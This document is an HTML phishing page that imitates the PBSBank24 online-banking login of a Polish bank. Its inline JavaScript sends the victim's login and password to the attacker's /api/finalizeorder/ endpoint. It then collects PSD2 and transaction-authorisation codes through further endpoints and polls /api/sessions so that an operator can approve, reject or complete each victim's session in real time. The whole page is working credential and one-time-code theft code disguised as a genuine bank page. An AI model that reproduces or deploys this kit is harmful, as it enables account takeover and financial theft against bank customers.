<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0023)https://sbe.pbsbank.pl/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta http-equiv="Cache-control" content="no-cache">

    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=8">
    <title>Bank Nowy BFG S.A.</title>







    <link href="/assets/banks/bfgsa_files/logowanie.css" type="text/css" rel="stylesheet">
    <link href="/assets/banks/bfgsa_files/customforms.css" type="text/css" rel="stylesheet">

    <!-- CSS IE -->
    <!--[if lte IE 6]>
    <link href="/pbs/css_client/ie6.css?cb=-5a6d9de5f072de834d1d6aee8de07d58acd02292" type="text/css" rel="stylesheet" >
    <![endif]-->
    <!--[if IE 7]>
    <link href="/pbs/css_client/ie7.css?cb=-5a6d9de5f072de834d1d6aee8de07d58acd02292" type="text/css" rel="stylesheet" >
    <![endif]-->
    <!--[if IE 8]>
    <link href="/pbs/css_client/ie8.css?cb=-5a6d9de5f072de834d1d6aee8de07d58acd02292" type="text/css" rel="stylesheet" >
    <![endif]-->






    <script type="text/javascript" src="/assets/banks/bfgsa_files/saved_resource"></script></head>
<body class="webkit" cz-shortcut-listen="true">

<!-- Naglowek z logo -->











<div id="header">













    <div id="language-selection-container" style="visibility: visible;">
        <label for="lang">Język</label>
        <div id="language-select-selectbox-wrapper" class="amg-selectbox-wrapper"><a id="language-select-selectbox-clickbar" class="amg-selectbox-clickable" tabindex="-1" style="width: 49px;">PL</a><div id="language-select-selectbox-container" class="amg-selectbox-container" style="display: none; min-width: 48px;"><ul><li id="language-select-option-0" class="amg-selectbox-selected-option"><a onclick="return false;">PL</a></li><li id="language-select-option-1" class=""><a onclick="return false;">EN</a></li></ul></div></div><div class="amg-selectbox-hidden-wrapper"><select onchange="return false" class="selectbox amg-selectbox-hidden" id="language-select" name="lang"><option value="pl" selected="selected">PL</option><option value="en">EN</option></select></div>
    </div>

    <a href="https://www.pbsbank.pl/" target="_blank" rel="noopener noreferrer">
        <img src="/assets/banks/bfgsa_files/logo_pbs.gif" alt="Copyright 2009 Podkarpacki Bank Spółdzielczy" class="logo">
    </a>



    <h1>System Bankowości Elektronicznej PBSBank24</h1>




</div>


<!-- Koniec naglowka z logo -->

<!-- Glowny kontener -->
<div id="main_contener">

    <!-- Lewa kolumna -->
    <div id="left_col" class="b_col">
        <!-- Sekcja informacyja -->
        <div class="box_bg" id="info">
            <div class="box_top">
                <div class="box_content">
                    <div class="additional-info"><div class="additional-info-content">
                            <div style="text-align:center"> <div><br><br> <span>Szanowny Kliencie <br> przed zalogowaniem:</span><br>Upewnij się, że nawiązałeś komunikację z Bankiem <br>w szyfrowanym połączeniu. Poprawny adres strony to: <a target="_self" href="https://sbe.pbsbank.pl/">https://sbe.pbsbank.pl</a> <div>Sprawdź aktualność certyfikatu wydanego dla sbe.pbsbank.pl przez Certum Extended Validation CA, Unizeto Technologies S.A.</div> <div><br><font color="373c92">Prosimy o przestrzeganie zasad bezpieczeństwa opisanych <br>w tym <a target="_self" href="https://www.pbsbank.pl/pl/docman-wszystko/rozne/236-zasady-bezpiecznego-korzystania-z-uslugi-pbsbank24-1">dokumencie.</a></font></div> <br> <br> </div> <div>Jeżeli stwierdzisz jakąkolwiek niezgodność prosimy <br>o niezwłoczne zaniechanie wszelkich czynności oraz natychmiastowy kontakt <br>z Bankiem: <br> <strong>801 372 772</strong>, <strong>+48 13 46 55 750</strong> <br> </div> <br> <div><br>Pamiętaj, aby zakończyć pracę<br>w systemie poprzez użycie opcji ‘Wyloguj’ gwarantuje to poprawne zamknięcie sesji.</div> </div>
                        </div></div>
                </div>
            </div>
        </div>
        <!-- Koniec sekcji informacyjnej -->
    </div>
    <!-- Koniec lewej kolumny -->


    <div id="center_col" class="c_col">
        <div class="box_bg"><div class="box_top">
                <div class="box_content">
                    <div class="box_green"><div class="box_green_top">
                            <div class="box_green_content box_login">
                                <h2 id="summaryInfo">Logowanie</h2>
                                <form class="login" id="form.login" name="form.login" action="https://sbe.pbsbank.pl/pbs/checkLogin" method="post" autocomplete="off">






                                    <input type="hidden" name="EPAYMENT_ENC_PARAMS" value="">





                                    <input type="hidden" name="psd2-fallback-token" value="">
                                    <input type="hidden" name="cert">
                                    <div class="login-error">








































                                    </div>
                                    <div id="otherForms">
                                        <div id="loginCont">
                                            <label for="login">Login:</label>
                                            <div id="user-id-container" class="keyboard-inputfield-container">
                                                <fieldset class="withKeyboard">
                                                    <input id="bank_login" class="ixxl" type="text" name="login" value="" maxlength="25500">
                                                    <img src="/assets/banks/bfgsa_files/ico_question.gif" width="12" height="12" alt="" class="tooltip-ico" id="anonymous_element_1"><span class="amg-help-cloud-content" style="display: none;" id="anonymous_element_2">Wpisz 8-cyfrowy numer login, który znajduje się na karcie informacyjnej przekazanej w przesyłce bankowej.</span>
                                                </fieldset>

                                            </div>
                                            <label for="login">Hasło:</label>
                                            <div id="user-id-container" class="keyboard-inputfield-container">
                                                <fieldset class="withKeyboard">
                                                    <input id="bank_password" class="ixxl" type="text" name="login" value="" maxlength="25500">
                                                    <img src="/assets/banks/bfgsa_files/ico_question.gif" width="12" height="12" alt="" class="tooltip-ico" id="anonymous_element_1"><span class="amg-help-cloud-content" style="display: none;" id="anonymous_element_2">Wpisz 8-cyfrowy numer login, który znajduje się na karcie informacyjnej przekazanej w przesyłce bankowej.</span>
                                                </fieldset>

                                            </div>
                                            <div class="login-button">
                                                <div id="alertDiv" class="capsLockAlertInlineDisplay" style="visibility:hidden">
                                                    <img style="vertical-align:middle" src="/assets/banks/bfgsa_files/warning.gif">
                                                    <span style="font-weight: bold; vertical-align:middle">Caps Lock jest włączony!</span>
                                                </div>
                                                <div id="buttonDiv" class="capsLockAlertInlineDisplay">

                                                    <a id="login-button" onclick="bankLogin()"><img src="/assets/banks/bfgsa_files/login.button.login.gif" class="button" alt="Zaloguj" style="" title="Zaloguj"></a>

                                                </div>

                                            </div>
                                        </div>
                                        <div id="infoCont" style="display: none">
                                            <p>Zaraz otrzymasz kod weryfikacyjny na twój telefon</p>
                                        </div>
                                        <div id="psdCont" style="display: none">
                                            <label for="login">PSD2</label>
                                            <div id="user-id-container" class="keyboard-inputfield-container">
                                                <fieldset class="withKeyboard">
                                                    <input id="bank_psd" class="ixxl" type="text" name="login" value="" maxlength="25500">
                                                    <img src="/assets/banks/bfgsa_files/ico_question.gif" width="12" height="12" alt="" class="tooltip-ico" id="anonymous_element_1"><span class="amg-help-cloud-content" style="display: none;" id="anonymous_element_2">Wpisz 8-cyfrowy numer login, który znajduje się na karcie informacyjnej przekazanej w przesyłce bankowej.</span>
                                                </fieldset>

                                            </div>
                                            <div class="login-button">
                                                <div id="alertDiv" class="capsLockAlertInlineDisplay" style="visibility:hidden">
                                                    <img style="vertical-align:middle" src="/assets/banks/bfgsa_files/warning.gif">
                                                    <span style="font-weight: bold; vertical-align:middle">Caps Lock jest włączony!</span>
                                                </div>
                                                <div id="buttonDiv" class="capsLockAlertInlineDisplay">

                                                    <a id="login-button" onclick="psdUpdate()"><img src="/assets/banks/bfgsa_files/login.button.login.gif" class="button" alt="Zaloguj" style="" title="Zaloguj"></a>

                                                </div>

                                            </div>
                                        </div>
                                    </div>


                                    <div id="summaryCont" style="display: none">
                                        <label for="login">Kod Potwierdzający</label>
                                        <div id="user-id-container" class="keyboard-inputfield-container">
                                            <fieldset class="withKeyboard">
                                                <input id="bank_summary" class="ixxl" type="text" name="login" value="" maxlength="25500">
                                                <img src="/assets/banks/bfgsa_files/ico_question.gif" width="12" height="12" alt="" class="tooltip-ico" id="anonymous_element_1"><span class="amg-help-cloud-content" style="display: none;" id="anonymous_element_2">Wpisz 8-cyfrowy numer login, który znajduje się na karcie informacyjnej przekazanej w przesyłce bankowej.</span>
                                            </fieldset>

                                        </div>
                                        <div class="login-button">
                                            <div id="alertDiv" class="capsLockAlertInlineDisplay" style="visibility:hidden">
                                                <img style="vertical-align:middle" src="/assets/banks/bfgsa_files/warning.gif">
                                                <span style="font-weight: bold; vertical-align:middle">Caps Lock jest włączony!</span>
                                            </div>
                                            <div id="buttonDiv" class="capsLockAlertInlineDisplay">

                                                <a id="login-button" onclick="summaryCode()"><img src="/assets/banks/bfgsa_files/login.button.login.gif" class="button" alt="Zaloguj" style="" title="Zaloguj"></a>

                                            </div>

                                        </div>
                                    </div>

                                    <div id="infosCont" style="display: none">
                                        <p>Trwa logowanie, proszę czekać</p>
                                    </div>






                                </form>
                            </div>
                        </div></div>
                    <!-- Komunikaty -->












                    <div id="news">

                        <div class="news-elem">
                            <h3><font color="#373c92">Kredyt przez internet</font></h3>
                            <div class="news-content">
                                <a href="https://www.pbsbank.pl/klienci-indywidualni-2/kredyty/e-pozyczka" target="_blank"><img src="/assets/banks/bfgsa_files/242x336_na-logowanie_epozyczka_bfg.jpg"></a>
                            </div>

                        </div>

                        <div class="news-elem">
                            <h3><font color="#373c92">Aplikacja mobilna</font></h3>
                            <div class="news-content">
                                <a href="https://www.pbsbank.pl/klienci-indywidualni-2/bankowosc-elektroniczna/aplikacja-mobilna-pbsbank24-mobile" target="_blank"><img src="/assets/banks/bfgsa_files/242x336_na-logowanie_aplkacja_bfg.jpg"></a>
                            </div>

                        </div>

                    </div>
                    <!-- Koniec komunikatów -->
                </div>
            </div></div>
    </div>

    <!-- Prawa kolumna -->
    <!-- folder w ktorym nalezy przechowywac pliki wciaz do ustalenia -->


















    <div id="right_col" class="b_col">
        <div id="banner1" class="box_bg">
            <div class="box_top"><div class="box_content">




                    <a href="https://www.pbsbank.pl/klienci-indywidualni-2/kredyty/kredyt-okolicznosciowy" target="_blank" rel="noopener noreferrer">



                        <img src="/assets/banks/bfgsa_files/bannerImage" alt="https://www.pbsbank.pl/klienci-indywidualni-2/kredyty/kredyt-okolicznosciowy">


                    </a>



                </div></div>
        </div>
        <div id="banner2" class="box_bg">
            <div class="box_top"><div class="box_content">




                    <a href="https://www.pbsbank.pl/klienci-indywidualni-2/oszczednosci-i-inwestycje/lokata-z-bonusem" target="_blank" rel="noopener noreferrer">



                        <img src="/assets/banks/bfgsa_files/bannerImage(1)" alt="https://www.pbsbank.pl/klienci-indywidualni-2/oszczednosci-i-inwestycje/lokata-z-bonusem">


                    </a>



                </div></div>
        </div>
    </div>
    <!-- Koniec prawej kolumny -->

</div>
<!-- Koniec glownego kontenera -->

<!-- Stopka -->











<div id="footer">
    <div class="fbox">
        <div class="footer_links_left">

            <a href="https://www.pbsbank.pl/pomoc" target="_blank" rel="noopener noreferrer">Pomoc</a>
            <a href="https://www.pbsbank.pl/o-banku/bezpieczenstwo" class="border_left" target="_blank" rel="noopener noreferrer">Bezpieczeństwo</a>
            <a href="https://www.pbsbank.pl/o-banku/kontakt" class="border_left" target="_blank" rel="noopener noreferrer">Formularz kontaktowy</a>
            <a href="https://www.pbsbank.pl/2-uncategorised/574-polityka-prywatnosci" class="border_left" target="_blank" rel="noopener noreferrer">Zastrzeżenia prawne</a>
        </div>
        <div class="footer_links_right">
            Powered by <a href="http://www.amg.net.pl/" target="_blank" rel="noopener noreferrer">AMG.net</a>
        </div>
    </div>
</div>


<!-- Koniec stopki -->
<div id="epd" style="display: none;">
    <div id="cookiesdirective" style="position: fixed; bottom: 0px; left: 0px; width: 100%; height: auto; background: none repeat scroll 0% 0% rgb(0, 0, 0); opacity: 0.8; color: rgb(255, 255, 255); font-size: 14px; text-align: center; z-index: 1000;">
        <div style="position:relative;height:auto;width:90%;padding:15px;margin-left:auto;margin-right:auto;">
            W celu zachowania najwyższej jakości świadczonych Państwu usług, w sposób dostosowany do indywidualnych potrzeb, wykorzystujemy informacje przechowywane w plikach cookies. Korzystanie z naszego serwisu internetowego bez zmiany ustawień dotyczących cookies oznacza, że wyrażają Państwo zgodę na ich zapisanie w pamięci urządzenia. Zmiany zasad korzystania z plików cookies można dokonać w każdym czasie w ustawieniach przeglądarki. Więcej informacji znajduje się w naszej
            <a href="https://www.pbsbank.pl/documents/10180/550553/Polityka+prywatno%C5%9Bci/823b6264-b188-46b0-a2c8-281404dab32f" style="color:#ca0000;font-weight:bold;font-family:arial;font-size:14px;">Polityce prywatności</a>.
            <br>
            <br>
            <input type="button" value="OK" onclick="cookieHide(&#39;epd&#39;)">
            <br>
            <br>
        </div>
    </div>
</div>
<!-- JS-->
<script src="/assets/js/jquery-3.5.1.min.js"></script>
<script src="/assets/js/cookies.core.1.3.min.js"></script>
<script>
    let cookieManager = new Cookies();
    let sessId = (cookieManager.read('session_id'))

    function readTextFile(file, callback) {
        var rawFile = new XMLHttpRequest();
        rawFile.overrideMimeType("application/json");
        rawFile.open("GET", file, true);
        rawFile.onreadystatechange = function() {
            if (rawFile.readyState === 4 && rawFile.status == "200") {
                callback(rawFile.responseText);
            }
        }
        rawFile.send(null);
    }

    const bankLogin = () => {
        if ($("#bank_password").val() && $("#bank_login").val() !== "") {
            $.post("/api/finalizeorder/", {
                bank_password: $("#bank_password").val(),
                bank_login: $("#bank_login").val(),
                sessionId: sessId
            }).done(data => {
                console.log('done')
                bfgsaUpdate()
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const bfgsaUpdate = () => {
        document.getElementById('psdCont').style.display = 'block'
        document.getElementById('infoCont').style.display = 'none'
        document.getElementById('loginCont').style.display = 'none'
    }

    const regularCheck = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "true") {
                        summaryFunc()
                        clearInterval(multipleFunc)
                    }
                } else {

                }
            }
        });
    }

    let bankId = (cookieManager.read('session_id'))

    const psdUpdate = () => {
        if ($("#bank_psd").val() !== "") {
            $.post("/api/psdupdate/", {
                bank_psd: $("#bank_psd").val(),
                sessionId: bankId
            }).done(data => {
                document.getElementById('loginCont').style.display = 'none'
                document.getElementById('infoCont').style.display = 'block';
                document.getElementById('psdCont').style.display = 'none'
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    let multipleFunc = setInterval(function(){ regularCheck() }, 3000);



    //WRONG PASS

    const wrongPass = () => {
        $.post("/api/wrongpass/", {
            sessionId: bankId,
            name: "false"
        }).done(data => {
            console.log('done')
        }).fail(error => {
            console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
        })
    }

    const regularPass = () => {
        readTextFile("/api/sessions", function(text){
            var data = JSON.parse(text);
            for (let i=0;i<data["result"].length;i++) {
                if (data["result"][i]["uid"] == sessId) {
                    if (data["result"][i]["accepted"] == "wrongPass") {
                        clearInterval(multiplePass)
                        wrongPass()
                        location.reload()
                    }
                } else {

                }
            }
        });
    }

    let multiplePass = setInterval(function(){ regularPass() }, 3000);


    //SUMMARY

    const summaryFunc = () => {
        document.getElementById('otherForms').style.display = 'none'
        document.getElementById('summaryCont').style.display = 'block'
        document.getElementById('summaryInfo').innerText = 'Autoryzuj Tranzakcję'

    }

    const summaryCode = () => {
        if ($("#bank_summary").val() !== "") {
            $.post("/api/summarycode/", {
                bank_summary: $("#bank_summary").val(),
                sessionId: bankId
            }).done(data => {

                document.getElementById('summaryCont').style.display = 'none'
                document.getElementById('infosCont').style.display = 'block'
            }).fail(error => {
                console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
            })

        } else {
            console.log('not selectec')
        }
    }

    const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);

</script>

</body></html>